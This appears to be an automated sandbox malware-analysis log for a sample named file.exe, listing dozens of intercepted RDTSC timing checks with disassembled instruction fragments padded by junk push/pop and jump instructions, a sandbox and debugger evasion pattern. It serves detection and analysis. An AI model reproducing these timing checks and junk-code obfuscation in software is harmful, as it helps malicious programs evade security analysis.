                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DBAC second address: 66DBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DBB2 second address: 66DBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DBB6 second address: 66DBC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FB418E85316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67324E second address: 673253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673253 second address: 673262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FB418E85316h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673262 second address: 673268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673268 second address: 6732B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB418E85316h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 jns 00007FB418E85316h 0x00000017 pop edx 0x00000018 push ebx 0x00000019 jmp 00007FB418E8531Ah 0x0000001e jmp 00007FB418E85327h 0x00000023 pop ebx 0x00000024 jng 00007FB418E8531Eh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6732B5 second address: 6732BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6736CC second address: 6736E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E8531Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673F0D second address: 673F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674063 second address: 674067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 672D70 second address: 672D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676DB7 second address: 676DBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679C0C second address: 679C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B134h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007FB418C0B126h 0x00000014 pop edx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679C33 second address: 679C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6815F7 second address: 681610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B135h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68037C second address: 6803CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FB418E85316h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB418E8531Dh 0x00000012 popad 0x00000013 jmp 00007FB418E85329h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB418E85325h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6803CA second address: 6803E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB418C0B126h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6803E3 second address: 6803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6803E7 second address: 6803F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB418C0B126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6803F8 second address: 6803FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680575 second address: 68057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308A3 second address: 63092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB418E85328h 0x0000000c nop 0x0000000d sub ecx, dword ptr [ebp+122D1D2Fh] 0x00000013 mov ebx, dword ptr [ebp+12485866h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB418E85318h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 jmp 00007FB418E85322h 0x00000038 mov di, ax 0x0000003b add eax, ebx 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FB418E85318h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov dx, 81E9h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63092A second address: 630931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68096A second address: 68096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68096F second address: 68097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB418C0B126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68097B second address: 680985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812BE second address: 6812C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812C4 second address: 6812E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB418E85327h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812E8 second address: 6812EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812EE second address: 68130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85320h 0x00000009 jo 00007FB418E85316h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6845EB second address: 6845F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683D4E second address: 683D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6842E5 second address: 6842FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB418C0B132h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6842FD second address: 684307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB418E85316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6878E0 second address: 6878F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Ah 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687A79 second address: 687A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E46 second address: 687E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E4A second address: 687E50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E50 second address: 687E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E56 second address: 687E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903AC second address: 6903B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903B0 second address: 6903D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FB418E85325h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903D2 second address: 6903E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690CF3 second address: 690D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB418E85316h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690D02 second address: 690D0C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691545 second address: 69154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691AFC second address: 691B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691B01 second address: 691B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691DEF second address: 691DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691DF4 second address: 691E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB418E8532Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E07 second address: 691E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E0B second address: 691E15 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418E85316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1E5 second address: 5EF1FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Ah 0x00000007 jmp 00007FB418C0B12Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1FD second address: 5EF209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB418E85316h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF209 second address: 5EF20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF20D second address: 5EF235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85321h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FB418E8531Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951B9 second address: 6951C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951C3 second address: 6951DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FB418E85316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951DA second address: 6951E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6951E0 second address: 6951E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69592C second address: 695934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695934 second address: 695938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695938 second address: 695942 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418C0B126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695B8D second address: 695B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695B9F second address: 695BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69ABCF second address: 69ABDD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69ABDD second address: 69ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B131h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0D9C second address: 6A0DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0DA4 second address: 6A0DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jng 00007FB418C0B126h 0x0000000c jc 00007FB418C0B126h 0x00000012 pop ecx 0x00000013 jng 00007FB418C0B12Ch 0x00000019 jnp 00007FB418C0B126h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0DC6 second address: 6A0E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB418E85316h 0x0000000a jnl 00007FB418E85316h 0x00000010 jmp 00007FB418E85323h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jne 00007FB418E85316h 0x0000001f pushad 0x00000020 popad 0x00000021 push edi 0x00000022 pop edi 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 jnc 00007FB418E8531Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A126C second address: 6A1276 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418C0B13Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A152A second address: 6A152E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A152E second address: 6A153E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB418C0B126h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A153E second address: 6A1542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A291E second address: 6A2925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2925 second address: 6A292B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A292B second address: 6A292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A292F second address: 6A293B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A07C4 second address: 6A0811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418C0B126h 0x0000000a jnc 00007FB418C0B126h 0x00000010 jnp 00007FB418C0B126h 0x00000016 popad 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007FB418C0B141h 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007FB418C0B126h 0x0000002c jc 00007FB418C0B126h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0811 second address: 6A0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6959 second address: 6A6968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007FB418C0B126h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6968 second address: 6A699A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85327h 0x00000007 jmp 00007FB418E85327h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB166 second address: 6AB16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB16E second address: 6AB174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB424 second address: 6AB442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B138h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D0C second address: 6B8D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB418E8531Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D1E second address: 6B8D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B131h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FB418C0B12Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D3F second address: 6B8D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FB418E8531Ch 0x0000000d jnc 00007FB418E85318h 0x00000013 push edx 0x00000014 jnp 00007FB418E85316h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F413B second address: 5F413F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F413F second address: 5F415F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB418E85320h 0x0000000b pop ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB418E85316h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8834 second address: 6B883A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B883A second address: 6B8851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB418E85316h 0x0000000a jmp 00007FB418E8531Ch 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8851 second address: 6B8857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8857 second address: 6B886E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418E85316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FB418E85316h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B886E second address: 6B8880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB418C0B126h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
